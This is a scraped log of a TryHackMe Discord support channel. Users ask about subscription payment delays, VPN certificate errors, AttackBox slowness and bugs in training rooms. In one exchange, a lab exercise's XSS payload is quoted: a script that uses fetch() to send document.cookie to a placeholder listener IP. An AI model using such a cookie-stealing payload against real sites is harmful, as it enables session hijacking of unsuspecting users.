#site-support
1 messages ยท Page 54 of 1
Doesn't work, I think it's a bug since they are updating their front end, I'll just use Chrome for now and I hope they fix it soon.
I wouldn't be so quick to think that it's a bug on their end, I can use the site just fine on my firefox browser (and I'm sure so can many others)
Yooo i am here for some help in doing hacking suff, anyone up for a dm?
This channel is for support with issues on the THM website. #general or #infosec-general will more than likely be the appropriate channels
Oh sorry my bad and thnx
hello, i'm having an issue enabling my subscription to the tryhackme website.
Dropping an email to THM Support Team would be your best bet. Do note that they have ~8 to 9 working days response time at the moment, but that should go down in the next couple of weeks now that the AoC event has concluded.
will do. Thank you!
hello, i paid for 1 month premium, the money was took from my bank account but the page is still on "Payment pending" till 5 minutes and i'm still not premium, why ?
How do I request a refund for my annual subscription?
Weโre waiting for confirmation from your bank that the payment has been successful. Please wait, youโre free to close this page in the meantime
@elder bone
Thanks!
Gave +1 Rep to @west chasm (current: #457 - 9)
When did your subscription auto-renew?
Hello Guys, I am trying OpenVAS room and I am failing to install it. After running: docker run -d -p 443:443 --name openvas mikesplain/openvas and extract finishing Attackbox runs out of space. docker: failed to register layer: Error processing tar file(exit status 1): write /usr/share/doc/w3af-console/readme/EN/w3af-users-guide.odt: no space left on device.
Hi, i'm trying https://tryhackme.com/room/breachingad this room, Breaching Active Directory, but the room doesn't show the IP of machine in the network diagram, i tried multiple times to leave and re join the room also after couple of days but nothing, it doesn't work yet. What can i do?
Have you been able to successfully connect to it previously?
If you haven't, do check this one -
#breaching-ad message
thank you, now i'm able to see the IP's, for me worked use http
Gave +1 Rep to @ivory spruce (current: #25 - 308)
guys how do i redeem a voucher if i have a still ongoing subscription?
the section to redeem vouchers in my profile disappeared
nvm just read vouchers don't expire
I tried to log in from a VM using Firefox and I got the same problem, I haven't been on the website for more than a week and I have no idea why it's glitched.
Have you tried on a different network?
Check the devtools network tab for any errors
some insights on my issue?
@heady belfry
Ok, I understood that it is not included by default, but you can install it
No, it says not to install it, youโre not meant to install it on the AttackBox ๐
For the reasons youโre experiencing in the error
I made a new account and it works fine, I only have this problem once I log into my main account.
Hmmm, you should contact support via the chat box option
I will, thanks for you time.
Gave +1 Rep to @glad oyster (current: #14 - 447)
Hi
I have fone my subscrption on teu hackme and the payment was processed 2 times by my 2 diferents credit cards
Done *
And i the site does not process the payment
So i paid 2 times and dont have any acess to the Premium area
I need a refund in one of those credit cards and need acess to plataform
That doesn't look like one of our front end updates.
There are a ton of reasons why this would occur.
As I haven't seen any other reports, it is likely a client issue.
It not occurring on a new account means it could be an A/B testing issue but those pages aren't being A/B tested as far as I am aware.
If it's only occurring on Firefox, and it's making the website unusable, I would suggest to not use Firefox for a few days.
Make sure that before you move Browser, disable all extensions and then perform a cache refresh.
Make sure you're not on a VPN, Proxy (burp/ other), and don't use a user agent scrambler.
Thanks for your response. I tried on Firefox safe mode and disabled all extensions and I still got the same problem, I made a new account and tried switching between accounts, and the error only occurred on my main account which seemed weird to me. I don't use any VPN, Proxy, or user agent scrambler. I'll use another browser for now and I hope it gets fixed soon. do I still have to create a ticket or asking on Discord is enough?
Gave +1 Rep to @bronze vale (current: #6 - 1103)
If someone can help i Will be to much glad
Really
I have the two invoce pdf, Both of day 03/02/2024
So i just wanna have my Premium access and my refund
My profile is caPYbara22 um plataform
The TryHackMe Discord Server
Thanks febert
Gave +1 Rep to @tight seal (current: #151 - 40)
we in jan now - i think this needs to be updated ->
Have you already sent an email to THM Support?
Yes i have
But no answer
You can make a ticket but itโs likely they will relay similar information I have
And i googled and has a redit post that say the suport is more fast on discord
THM Support standard response time is at ~8 to 9 working days last month due to AoC, but that is expected to go down. Also, please do not send any follow ups during the said time so as not to push your ticket down the queue.
Gave 1 Rep to hawdee (current: #1956 - 1)
Wrong person, oops
If this seems to be a client-side issue, I'm not sure how THM Support can replicate the issue to analyze and resolve it.
I was supposed to see machines here with IP's but after doing alot refreshing I still don't see them
does Ctrl + F5 work?
Have you contacted support?
I think that should be solved soon i guess
pinned message says go here https://tryhackme.chargebeeportal.com/
No, that for something entirely different.
I wouldn't recommend posting your email address @quiet island, some crafty people know how to remove mobile image edits :)
raises hand
Support in the Discord server is mainly from voluntary staff ๐
Due to the sensitive nature of payments, we (TryHackMe employees) cannot discuss this kind of information through the Discord server.
anything having anything to do with personal info including payments etc. should never (and has never) been talked about in a public channel - any business who does differently i would run away from
Not really.
Take a look at Mandiant, they had 2fa and still managed to lose thier twitter account.
stick with e-mail or phone calls for personal info - you want to be directly talking to a human
hello there how can i reset my passwords on try hack me .I lost my an i pay subscritions
We provide the support channels on the website for this reason:)
Reset your password.
Thanks a lots
Thanks for ali the suport guys
Mods can see deleted messages
'Lol' -- is this code!?
Code for - Trying to be sarcastic ๐
i was just going to point out the discord help section , then saw who asked
No no
I mean really
Thanks for help
In my country end the thanks with laugh is common
But then i thought that in english this can be like rude
I dont know
But really thanks for all of help
All help*
The suport team is talk with me right know
And thanks for the tip
Gave +1 Rep to @bronze vale (current: #6 - 1104)
I had no idea that type of image manipulation can be done
Yeah, there was a whole vulnerability with snip n sketch users could retreive any parts of the image that was edited.
Or cut.
That have some articles abbout it?
We're the day after and i still don't have my premium activated, i don't think it's normal
You'll have to email support unfortunately
I saw that Jabba ๐
The remote web server hosts an application that is affected by an information disclosure vulnerability. (Nessus Plugin ID 177217)
https://www.theverge.com/2023/3/21/23650657/windows-snipping-tool-crop-screenshots-vulnerability
Last one, any more info, please use #general
Not able to reset a room progress
Can you screenshot/record your screen?
It says reset successful it loads and it's still complete
What happens when you refresh with Ctrl and F5?
Which room?
Passive reconnaissance
Can you link me?
Sure
I was able to reset it fine
But what should i do?
ty i just learned of this possibility
Gave +1 Rep to @weary spindle (current: #3 - 1801)
Do you have any error codes in the browser console?
It's really handy if a room gets a badge update.
This did the job thnx
Boys
Girls.
My mistake
Just one more question, the 2FA is disable?
I mean when i try to generate the bar code, shows a erros message
Guess who you'll need to contact for that.. ๐
Heheheheheheh
hey, i have problem connecting to vpn (on windows 11 and kali VM same error):
VERIFY ERROR: depth=1, error=self-signed certificate in certificate chain: CN=ChangeMe, serial=xxxxx OpenSSL: error:0A000086:SSL routines::certificate verify failed: TLS_ERROR: BIO read tls_read_plaintext error TLS Error: TLS object -> incoming plaintext read error TLS Error: TLS handshake failed SIGUSR1[soft,tls-error] received, process restarting
tried to recreate THM VM, downloaded ovpn config files a few times.
changed VPN Server from EU-Regular-3 to EU-Regular-1, problem solved
Is there any THM staff in this channel?
sometimes
Bought premium yesterday but it never activated on my account
Still waiting on the ticket I submitted
there is a few days lead time - you just need to wait
THm will be awaiting confirmation from your bank.
What if I used paypal? I had a confirmation from paypal and an invoice from THM
Question: I've changed Discord-account and on my old account that is still on this server (and probably connected to my THM.account somehow) I see a lot more channels than on my new Discord-account (this one).
Can I unlink my old account and link this one instead? I am subscribed member.
It is possible to do such a thing, but it has to be done manually by a server moderator. I would just ask one politely when you see them around, most likely you will see them in #general. That being said there are only a couple of channels locked off based on your roles so I also think you might need to check out the Channels & Roles section and add yourself to the other channels you want by ticking the boxes on this page.
I see, makes sense and I'll do both those things. Thanks for the answer ๐
Guessing I just can't re-verify with my code from the site from the new Discord-account?
Nah I don't think that works
Have enough purple?
haha, nah, it is never enough
guys can you suggest me a free website builder (i already bought my domain i just need to build the website)
word-press is fairly user friendly and open-source - not bad to know either lots of sites use it
is it free?
i mean, 90% of the most popular builders ask for an upgrade plan to connect to a custom domain
as far as i know - it has plugins for things like connecting to ups for stores to do shipping etc and those can cost $ , but just a plain old site is
thats for hosting though - if you just want to host yourself -> https://wordpress.org/download/
thanks ๐
hello
I hope you are doing well.
I'm trying to connect to a just downloaded .ovpn file but I'm not able to connect to the VPN.
can someone help me out with this please?
get another opvn , try a differnt end point also
Looks like your vpn file is faulty. On the access page, could you try to press regenerate, then wait 2 - 3 minutes, and only then try to download it.
And/or trying to change the server and do the same.
also run a apt update
the update has been done already.
let me try to regenerate the vpn then try the access after 2 minutes
It's about downloading it after waiting 2 - 3 minutes, not the "using" it part, just to be clear ๐
ok ok got it
I've changed zone, now let me wait for the time to download it
it worked
THANK YOU ALL
Hello, i'm trying to access kali machine but it's not starting and it shows error "failed to connect server* help please
help me
what is issue ?
Is this the Attackbox?
What help do you need? Is it THM-related?
It's just loading....I refreshed it a lot of time....but nope ....my network is working properly....I can stream in hd but can't download this file
And I'm facing this issue only with hololive network file ...
I'm able to download all other files
try select other server and regenerate
I did everything possible I can
do same problem if you try to regfenerate normal THM vpn or just with holo
Yeah just holo
I can download all other config files like adenumeration and other network
It's just holo
then is something on thm side
Well I did it ...
I'm not even download the file...it just shows loading...
And its only with holo network
why when I always make a discovery scan with the given IP address (in try hack me), the IP is always down? Do i need to use a VPN or is it a firewall?
Either the VPN or the AttackBox. The addresses are all 10.10.. so "internal" to THM. The other thing to keep in mind is that if you're using any variant of a ping scan (icmp), you often get false negatives because a lot of the machines (the Windows ones in particular) don't respond to icmp at all.
I cant connect to the OpenVPN following tryhackme tutorial
estart pause, 128 second(s)
2024-01-06 05:33:14 TCP/UDP: Preserving recently used remote address: [AF_INET]18.202.168.160:1194
2024-01-06 05:33:14 Socket Buffers: R=[212992->212992] S=[212992->212992]
2024-01-06 05:33:14 UDPv4 link local: (not bound)
2024-01-06 05:33:14 UDPv4 link remote: [AF_INET]18.202.168.160:1194
2024-01-06 05:33:14 TLS: Initial packet from [AF_INET]18.202.168.160:1194, sid=a8b74de0 ab204238
2024-01-06 05:33:14 VERIFY ERROR: depth=1, error=self-signed certificate in certificate chain: CN=ChangeMe, serial=425397202556807641543660048237946304772097879576
2024-01-06 05:33:14 OpenSSL: error:0A000086:SSL routines::certificate verify failed:
2024-01-06 05:33:14 TLS_ERROR: BIO read tls_read_plaintext error
2024-01-06 05:33:14 TLS Error: TLS object -> incoming plaintext read error
2024-01-06 05:33:14 TLS Error: TLS handshake failed
2024-01-06 05:33:14 SIGUSR1[soft,tls-error] received, process restarting
2024-01-06 05:33:14 Restart pause, 256 second(s)
Im getting these on my terminal
Yeah, I've got no idea about that. I just use the AttackBox so I don't have to diddle things on my end.
I changed the .ovpn file I downloaded and it worked
Could you tell me in which way you changed it ? I am facing the same problem
https://tryhackme.com/access -> Change VPN server in drop-down list -> Regenerate -> Download My configuration file -> start openvpn with new config file downloaded
I didn't try changing the vpn server, thanks
Gave +1 Rep to @frank cobalt (current: #785 - 4)
Yes
It works ! Thanks for the help
this should be pinned - comes up at least twice a day
Is the tryhackme page itself slow for you too? I had that several times last few days from different internet connections. For example loading the learning paths on the main dashboard takes 10+ seconds sometimes
from my side is working fine, I am in europe
however, the same VPN problem I got, and I can not figure it out, don't know why it is connected but I can not access the machines
tried already with 3 different servers and it is still not working
What is your VPN output?
it looks like I am connected and everything looks fine except the warn with the 64-bit block cipher
it says that I am connected even in the access page
Does it says initialization sequence completed? If it says that then everything should be good regardless of the warning
but on the network part it looks like it mentions "you dont have access to any network"
? Where are looking to see that? Did you try and ping 10.10.10.10 to see if you are connected?
here: https://tryhackme.com/access?type=networks and I can not ping 10.10.10.10, looking for the "initialization sequnce" part to see if I got it or not
the last thing that it says in the logs is: EVENT: CONNECTED
Oh are you using the GUI?
Oh
I am on W11
I am not that familiar with troubleshooting that, hmm
Well most people just use a kali VM and use the Terminal on that but uhh it should work fine the way you are doing it, it is just a lot harder to troubleshoot
yeah, well I got a Kali machine, but I just wanted to test a few things on W11 also
so I am struggling with that now
Fair enough
yeah ๐
Could you send a screenshot of this? It seems like you might be in any network rooms and therefore can't download their VPN config files maybe? Are you trying to access a network room or the normal THM rooms?
^ You have to do that to send screenshots
only 1 moment trying with the console
mk
a normal THM room
Which vpn server are you downloading a config file for?
it says in the picture, EU-VIP-1
I tried with multiple and regenerating them, so it is not that ๐ฆ
i would check that your getting an ip AND a route
I am getting an IP, will check about the route now
And you still can't ping 10.10.10.10? Based on what little logs you showed it looks fine, but I don't have a ton to go off here and I don't think the troubleshooting script works on windows
should look similar to
10.10.0.0 10.14.0.1 255.255.0.0 UG 1000 0 0 tun0 10.14.0.0 0.0.0.0 255.255.128.0 U 0 0 0 tun0
yeah I got the routes also :/
it does not get to the first hop
on 10.10.10.10
RTO without even getting to a first hop
can you get anywhere? - i dont know if the gw responds to icmp so pining that may not help
i tried traceroute on the gateway, doesn't do anything ๐
i am not sure how THM sees me as connected
looks like I got a hop when I am tracerouting the gateway
but then a lot of RTOs
most of us are blindly guessing at THM's setup - although it's fairly straight forward - only an employee could really tell you whats happening on the backed - also double check you have ALL firewall etc turned off - anf FYI i have never gotten thm vpn to work in win10 let allone 11
ok, understood, I am going to give up for now, use the Kali
I managed to do a security exclusion on that machine particulary to make sure it is not interfeering with anything
thanks for the help guys, have a great day ahead
its windows - the os can , and does , tell you it's done one thing but really it hasn't for "your safety"
agree with that
i usted to tell my ex that apples were the kids version of pc's - she hated that as she was an apple user
Hi, I've a question, I have an yearly THM sub expiring in Nov 2024, but I'm not sure if I'd wanna continue with THM sub in future (not because I don't like it, but because I'm generally averse to recurring subscription services so I try to avoid most of them ๐ ). So, If I go cancel subscription now will it take away my current benefits as well or will it just not renew at expiration.
Remove at expiration.
So my current premium features would still be available right, until Nov 2024?
Yeah. ๐
Thanks ๐
Hi all, I have a problem with a forgotten password. the problem is that I send an email to https://tryhackme.com/forgot, but nothing comes to the mail.
You send an E-mail to that address?
Or you request the page to E-mail you?
more than a few places i make a sub , then cancel right away - it gives me the time i paid for , but doesn't suddenly charge me - i also have 1 or 2 i have marked in my cal to decide to pay again or cancel
umm, I just tried to use "forgot password" in login page and got https://tryhackme.com/forgot, entered my email, and I did not get any mail from tryhackme with "now you enter new passwd"
Did you get any Email?
assuming you're checking your spam etc
"If the user exists, then you will receive an email with a password reset link."
this use exists 100%
no(
I did not get any email, I guess I deleted option to get email from tryhackme, but as far as I know in "forgot passwd" cases it should work
Any in your spam?
yes sir, everywhere
In that case you'll need to shoot an E-mail to support.
hey i think the output here might be wrong ?
if someone were to go with the walkthrough it would say this
Are you definetly looking at 3 and comparing it with 3?
yes
here you can see lab3.php
according to what was taught we should look at the /var/www/html/lab3.php < so we should add 3 dot dot
yet it works only when you add 4 (i just added 4 so it works as the walkthrough) but isnt it suppose to be 3 dots acording to the practical ?
it works with 3 dotted at the lab 2 and 1 but not lab 3 , my guess is that lab 3 wasnt configured correctly ?
Hi everyone, I am trying to get into the Wreath room, but the .ovpn file that I download is 0-Bytes, event if i re-generated it multiple times.. Any hint on how to tackle that?
change zones see if you can get a non zero byte file
Thanks, Febert, i'm trying that!
Did a few changes + regenerated, but still 0 bytes
many thanks Scrubz & Febert
In Metasploit: Exploitation, Task 6, there seems to be a bug/mistake in the examples, when using the AttackBox
The in the example given Port 6666 seems to be already in use by Docker, so later on the setup fails to run. Using another ports works fine.
same in lab 6
or did i not understand the room
It's not always 3 ...
it's because of where you start /var/www/html -> ../../../
i know but , it needs 4 dots to work
oh thats just escaping
?
like when you want to put a " in a string ... you have to enclose the string in " so string a="1" is ok , but string a=""" is not , you need to escape it , somthing like string a="\"" so it knows the use the char and not the function of that (in this case end of string) - so because the . is a function to do a dot you need to escape it , the escape in this case is . to to make a . you need <escape symbol>. or .. for 2 dots <escape>.<escape>. - make sense ?
FYI i had to type a="\\"" for that to show
In computing and telecommunication, an escape character is a character that invokes an alternative interpretation on the following characters in a character sequence. An escape character is a particular case of metacharacters. Generally, the judgement of whether something is an escape character or not depends on the context.
In the telecommunica...
i think you mis understood me on something , i meant
for it to show me the file ( it needs 4 (../) but isnt the directroy that it need to jump over is /var/www/html <-- so in this case 3 (../) )
what does it need the extra ../ for
Is there an overview of hours spend in the last days/weeks/monts?
or just the "X studied this week"
Hi,
I've an issue with my subscription as transaction has counted twice from my bank account, I send an email since 3 days. I only got a bot email response and no one from support response back
It can take a bit for them to respond, the support via email are only ones that can help with payment related issues though so you just have to wait
Thanks @gleaming flume
Gave +1 Rep to @gleaming flume (current: #51 - 128)
Only this. I'm not sure if these are available for education or business accounts, but in any case, you can drop it in the #feedback-and-ideas
It seems to be for the THM-profile directory.
yes but it's not shown though as in the walkthrough
THM-profile/html/www/var/etc/os-release
kkk now i get it , i forgot that the directory that in the call are counted as well thanks
Gave +1 Rep to @ivory spruce (current: #25 - 310)
Hey im having issues downloading the VPN for the Wreath Network room, ive regenerated the file, i can download other network room vpns fine and ive left and rejoined the room, when i click download it just loads infinately, i also captured the request and sent it in burpsuite and the /vpn/get-config where it gets the file from dosent respond when passed the network ID for the wreath room
Site support, it's still doing it:
It's only 10:15pm for me, I just went to do my daily THM and I've been reset to 0 streak.
I thought you had until midnight...
How long is the streak that you lost? You can drop an email to THM Support and they can sort it out for you.
Hi guys, quick question, my account is identified as a Ukraine account... but i'm far from ukraine... and I don't have nor had any ukraine vpn or anything....
Gave 1 Rep to inf0s3cw4nn4b3 (current: #25 - 311)
Thanks man!
I'm unable to generate a VPN file for "Breaching AD" It's of zero bytes.
I am having DNS issues too while connecting from my local machine. I tried seeing all the pinned messages from the "breachingad channel" but nothing works
Hello, someone on koth is playing unfairly
What are they doing?
Leave the room for 30 min(s)
hello, they removed suid bit for sudo on the production box
๐
I'm not sure of that's against the rules or not.
Hey everyone, can someone please help with the subscription? I got the invoice on the email, but on the website it's been pending for like 15 minutes
Hey why i cant attach the picture here ?
i keep getting this once i change the room, Uh-oh! You can only deploy a maximum of 3 machines at a time.
Can someone advise what to do ?
and i cant get new IP address for the new room..
Hi all, can anyone download the Wreath vpn file? Everytime i try its 0 bytes... I've regenerated few times yesterday and today and changed region, but still 0 bytes.
Hello, apparently there is a discord account already linked to the tryhackme account, hence the discord token. It's a pity there is no info on how to use the token to claim the account -- or it's meant for another use ?
you need to verify
Good luck, I have been waiting for like 3 days now. Still can't access premium.
What error are you getting? The full openvpn output would be helpful here
You could send a screenshot of it if you verify your account
it always say pause rueseme
? Not familiar enough with that issue to know of an immediate solution, could you give me more to work with?
As I said the whole output is helpful, not just like two words from it lol
Which OS
Country?
egypt
The vpn won't work in Egypt, I'm sorry, you'll need to use the Attackbox.
I purchased a 1 month subscription 3 times and none of them were reflected in my account. I've been looking for ways to open a ticket and ask for help for days, but no one is interested in my problem. Either give me my money or give me my subscription. That's enough, I've been waiting for days. What is the purpose of using such a payment system if I have to wait this long? If there is a method that you think does not work, do not use it. It's that simple. I've been opening a ticket for days, no one has responded, now you say you'll be back on Monday as if nothing happened. Please, I would be very grateful if someone could help me regarding this issue.
Do not keep attempting to make payments if they are not going through properly. Email support are the only ones that can help with such issues and unfortunately their response time can a little while yes, as they have lots of tickets to work through. Just email them once and then wait, if you email multiple times you get sent to the back of queue because of how their system works, so just be patient. I know its frustrating but there is nothing we can do for you here about it, hopefully support will get it resolved for you as quick as they can
I understood thank you. I dont live in England, I wanted to ask if they could be on new year holiday or something.
Hmm, not sure. I feel like most of the holidays are over, but idk for sure
its been almost 10 days and I havent received the slightest response message or email about my problem. I wake up every day and check the site and my mailbox.
That is certainly reaching the limit of how long I would think the response time would be. It was sitting about 8-9 business days during AoC, but I would think they would calming down and lowering that number a bit now that the event is over. Not sure, I would wait a few more days and then go from there.
anyway thank you for replying It feels good that at least someone in the community cares about our problems โค๏ธ
np, I hope they get it sorted out for you soon
I have been unable to connect to the VPN servers. I have tried a both east and west US and have regenerated my keys. I've tried it through openvpn on linux(which i updated) as well as macOS.
Try eu reg
what error do you get when you connect?
I have created ticket for more than 10days and I also haven't received any response.
If it has been more than 10 working days, I would suggest sending a follow up email.
I have already sent 2 emails to suport email
General statement which folks might run into and need to share with others... If you are running your own Kali and Metasploit instead of the attack box, there is a bug since 6.3.47 (https://github.com/rapid7/metasploit-framework/issues/18647). Myself, I'm updated and was at 6.3.49. They did some library reorg and they didn't move over the sysinfo portion. This is impacting multiple modules. If you get a wall of text starting with the line 'undefined local variable or method 'sysinfo' and ends with did you mean @sysinfo then this is impacting there.. There is a pull request pending, but until its integrated you can make the edit yourself and add the method back in.. Here's the pull request -- https://github.com/rapid7/metasploit-framework/pull/18667. I made a copy of my /usr/share/metasploit-framework/lib/msf/core/session_compatibility.rb added the missing method and the broken modules started working again.
Hyy guys
It's been 4 days I'm trying to download the config file for holo network but I can't..
It's just loading....
I did everything possible I can ....
Also made a ticket for support but didn't got any reply...
Can any of u try to download that file to see if it's the problem just with me
Can you leave the room for 30 mins? (Using the cog)
That's what I'm doing from 4 days
Also the problem is only with the holo config
I can download all others
Yeah, the network ones differ for other members
So what solution are u offering?
I can't do anything except suggest leaving the room with the cog and re joining
Think I encountered a bug in the Active Reconnaissance room (https://tryhackme.com/room/activerecon), Task 6. The port appears to be closed. Terminated the VM, restarted it, tried again after ten minutes and got the same result. Verified the command I was using against a walkthrough and it seems I should be getting a response.
Any staff member here ??
Please do me a favour and help me with holo config file
I'm stuck for 4 days and everytime I try to download it it just gets in loading mode forever โพ๏ธ...I mean please
Have you tried reaching out to THM Support via email (as that is the formal channel for support)?
I can't finish Task 8 in the Cross-site Scripting room.
It tells me to set up netcat on listening port 9001 then to create a ticket on the target site and to enter the payload: </textarea><script>fetch('http://URL_OR_IP:PORT_NUMBER?cookie=' + btoa(document.cookie) );</script> Then it proceeds to NOT send me the staff-session cookie. I have triple checked so everything is correct but I still cannot recieve anything on my listening port.
Are you doing this on the attackbox?
Yes
Are you using the attackbox ip and port
10.10.10.10:9001 ?
10 is a placeholder
Yeah mine look like this </textarea><script>fetch('"""https""://XX.XX.XX.XX:9001?cookie=' + btoa(document.cookie) );</script>
For me my attack site is https btw
Try with just the http, and change port.
Iirc this box is like blue and too many things wrong and won't work
Well i didn't tried that ... although I created a ticket u know on thm ...?
Solved, accidentally used the website IP instead of my machines actual ip๐ Thanks for helping me.
Hello, who can I contact about the advent of cyber award? I received a shopping code that does not work. I wrote to support, but for several days no one answers me. Maybe here someone can help me, because I wanted to order a sweatshirt from the store for the code I received.
support is delayed atm due to the event, pleaes be patient. ๐
ok, thank you ๐
Gave +1 Rep to @weary spindle (current: #2 - 1821)
If you already sent a ticket to THM Support, do allow them some time to get back to you as the standard response time is at ~8 to 9 working days
Hi, I'm trying to use tryhackme on my vm kali linux, I've installed the openvpn file configuration and connected to tryhackme via the openvpn and it all worked out great, but then when I'm trying to connect via ssh using this command: ssh tryhackme@ROOMS_IP_ADDRESS, I get this error: tryhackme@ROOMS_IP_ADDRESS: Permission denied (publickey)
I've tried many solutions including changing .ssh folder and public key and private key permissions
And regenerat the key pair using ssh-keygen then using the add-key command
Nothing worked out for me, any ideas?
Which machine?
Usually if its public key only you can't ssh in.
What do you mean by which machine?
I'm taking the learn path Jr Penetration tester, introduction to web hacking.
My friend is taking the same path without any issues with ssh
Are you using the correct machine?
Screenshots can help
It's been 4 days i paid for premium and it's still not activated. I send a email to support and created a ticket, still no answers...
It's starting to get long, i really need the THM premium course now
Support will be in touch soon.
Please wait patiently. ๐
Hey! Support is closed over the weekend, they will get back to you soon
I couldn't send any photos here ๐ฅฒ
You need to verify with the above link.
As I said above, when a machine replies with a public key, they can't be ssh'd in to.
Content Discovery doesn't require you to SSH in to the box.
Does any1 know when the subscriptions will be fixed?
"Fixed" do you mean, you've paid for subscription but it's not been applied yet?
Yeah, it's been pending for more than 24 hrs
Yeah, THM waits for the banks confirmation IIRC>
I got the email saying "Your subscription is active"
Thank you. Been having this issue all day and couldnt find the problem. Thanks
Gave +1 Rep to @tawdry vortex (current: #390 - 11)
Yep I am in the same boat. Ordered premium last week and still no answer.
Is TryHackMe a small business? I haven't seen a business use a manual subscription process like this before.
I hope they will give any kind of bonus for this cz it's really weird
It's not "manual" but they still need to wait for confirmation from their bank.
The*
Excuse me?
I mean I checked my bank and the payment went thru but the premium hasn't been applied so it is manual. I haven't had any site or service that I bought a sub to where it wasn't instantaneous.
Me too
Same here, last time i got myself thm premium - it instantly appeared in the profile
Could be the bank's processing being slow to confirm the transaction to THM
my bank says the transaction is completed, i think there's some kind of a bug
Yeah the bank processed the payment a couple days ago
Oh it's been days? Hmmm...
Just check and it looks like THM is based out of Londan so probably won't see any help today.
Yeah put my ticket in 4 days ago
Hasn't even moved to In Progress yet
Staff don't work weekend.
Yeah I realize that but the payment cleared so they should just be able to apply the subscription today.
Thats why I was wondering if THM was a small business. Normally a subscription service wouldn't be this clunky. I paid for a year but imagine if I only paid for a month. If it takes 8-9 days to respond I would have lost 1/4 to 1/3 of my access time.....
Response time is delayed due to the AoC event.
I can't disclose how many employees THM have.
You can't tell us how many, what their usernames are, and the ticket system being used? Darn 
Support aren't on Discord AFAIK.
Which is weird because they link this discord on their "Contact Us" page
I meant like on the ticket system, just joking about sensitive information disclosure
Account, payments and other information can't be spoken about over Discord.
I wasn't asking about that
Oh, simple the longer the E-mail the higher up, but if you email again, it will push it back down the queue.
I was pointing out that they use this discord on the "Contact Us" page as a means to contact them but as you saided they aren't on the discord.
Does your customer portal page say you are subscribed?
8-9 days waiting for paid subscription doesnt sound right
where can i find that
At the bottom of the "Thanks for subscribing" email. Says "Log into your account now" link and it will send you a OTP.
Can find it in profile > subscription
My subscription page just askes me if I want to sub. But my subscription portal shows my current subscription.
it is paid for me
yeah same
Oh weird it wouldn't let me paste my picture
You need to verify.
Oh cool thanks
Hello, I purchased a year subscription on Sunday, but it hasn't activated. The charges are reflected on the bank statement though. I did submit a ticket but it still hasn't been looked at. Any help would be greatly appreciated, thank you!
welcome to the waiting club haha
there are many of us now, guess we just gotta wait
no one knows for how long
Wait what lol? How long have you been waiting?
For me it's been 2 days, some folks've been waiting for 4-7
been waiting for 9 days๐ญ
And thereโs been zero communication from them?
mod here said normal response time now is 8-9 days
Thatโs atrocious. Unless they credit back the time you were waiting for it to be activated
I hope they give us some kind of bonus
I had a sub a long time ago and it didnโt require these hoops
I canโt even wrap my head around how 8-9 days is the standard
It became the standard when they were swamped with the AoC event, I would have thought it would calm down after the event but who knows.
Hopefully they will be able to lower that time soon
i noticed in the screenshot above that it was for a student subscription. Not sure how many of you having problems are using that same level. I don't know if THM does pre-verification of student status or post-verification- but there is likely a verification process.. otherwise, anyone could just say they were a student. Having done student subscriptions previously, some vendors let it go through quickly if they can validate that you have an .edu address for example (but not alumni edu).. Another vendor needed a copy of a transcript or a valid student ID. I'm just wondering if the delay is not the payment portion, but the student validation portion.
This right here could be it. But it did ask me to verify the email which I did do. Obviously I canโt speak for everyone though
and again, if its an automated thing where they just needed you to reply from a valid student email, that could be quicker.. if it's a real human who has to look at a student ID and decide if it's really you or a fake ID to let you into the bar to drink... well then.. it might take a little longer. ๐ All speculative, but that would be a factor. That will also help if we find out that all of these multiple people having delays are students, then we'd have a correlation factor.
They do, i got verified via student email. If you dont use ur student email - you gotta pay full price first
They will. Please be patient. Also, while waiting on their reply, do not send a follow up email until ~8 to 9 days has passed as it will push your ticket down the queue.
hi, does anyone knows how to fix this (--cipher is not set. OpenVPN versions before 2.5 defaulted to BF-CBC as fallback when cipher negotiation failed in this case. If you need this fallback please add '--data-ciphers-fallback BF-CBC' to your configuration and/or add BF-CBC to --data-ciphers.) ?
Have you tried to re-generate your ovpn config file?
do you mean like try to download it again?
Yes
yes, i have been installing it multiple times but it's always the same thing.
Is that the error message you are getting when trying to connect to THM OpenVPN.
yes
Can you try running this -
https://github.com/tryhackme/openvpn-troubleshooting/blob/master/thm-troubleshoot
what is bastion hosting
My AWS enviroment has some issues and waiting for more than 10days ,the support replied my ticket.But it only said I should check my network and let them know if none of the above work. I replied the email and waiting another 10 days. But my aws path only 3 month,I need to spend more than one month to wait ?
Anyone else having Attackbox issues? It ran totally fine for me this morning but now it's basically unresponsive. Tried restarting it serveral times, restarting the browser, restarting the computer, etc. Still the same. Takes forever to load then pretty much doesn't work after it does.
ur killing me jeez i wanted to start a couple of days ago now ur telling me i have to wait more : (
Suggest to post this in the #infosec-general channel.
I have been having similar problems with attack box. for some reason nmap will not finish a scan no matter how long I wait
I switched connections and still having the same problem. It works but it's extremely slow, takes a minute to type commands. It runs the commands at relateively normal speeds once they're executed, though. Maybe I should just wait and try again tomorrow...
I have that exact same issue rn
I'm doing the Network Security module in the Jr Pentester path, nmap and protocols/servers rooms. Maybe something's just up with the Attackbox servers tonight.
I've had the subscription for a month and this is my first time having any issues with it (and I use it every day), so I don't think it's anything on my end but I guess it always could be.
Tried a CTF with the Kali box and it's just as bad. I'm just gonna wait til later and try again, too exhausting to wait for minutes on end for a few clicks or keystrokes. Hopefully it gets fixed soon...
I ended up using rustscan instead of nmap but I don't think I should have to do that
Hey all, is it possible to change the name on the certificates you receive? I realised I've used the wrong name and would like to have that changed :/
Happy to report that after waiting a few hours Attackbox is now back to working normally for me, must have just been a temporary server issue. Happy hacking, everybody. โ๏ธ ๐
Not after they've been generated, no.
hello everyone
Hello, I am new to the platform and I am in the process of making the nmap module. I'm typing the commands on my target machine from my vm connected via VPN but it doesn't seem to work. But when I use the same command from the kali vm which is available via the web it works. I can even use nmap from my vm to this kali but not to the target machine? Any ideas ?
Can you send a screenshot of the command output from your VM? Also, have you checked that your VPN is successfully connected to the THM OpenVPN?
yep i have an IP
You'll have to verify in order to send screenshots though
Are the folks in the "THM Staff" in the discord part of the company staff that can support?
Whatโs up?
I had a support ticket put in for going on 5 days now. I purchased a premium subscription last Thrusday but it still hasn't been applied to my account.
Yes, support is closed over the weekend which means itโs only been a few days ๐
They will get to your query soon. Sorry for the inconvenience
Do they refund the time I have lost?
Not support, but what's up (without disclosing any account stuff)
hey @weary spindle
its been a while
just want to ask about ethical thing please
I have uploaded my notes to github, since they are very handy and easy to read
but some parts of these notes were actually taken from TryHackMe as a reference for me without editing
and I have mentioned this in the readme file
is this valid?
Jabba is typing, they can give you a more accurate answer.
ok @weary spindle ty
Gave +1 Rep to @weary spindle (current: #2 - 1824)
Using official TryHackMe graphics or explanations from premium rooms may be against the terms of service and infringe on copyright law
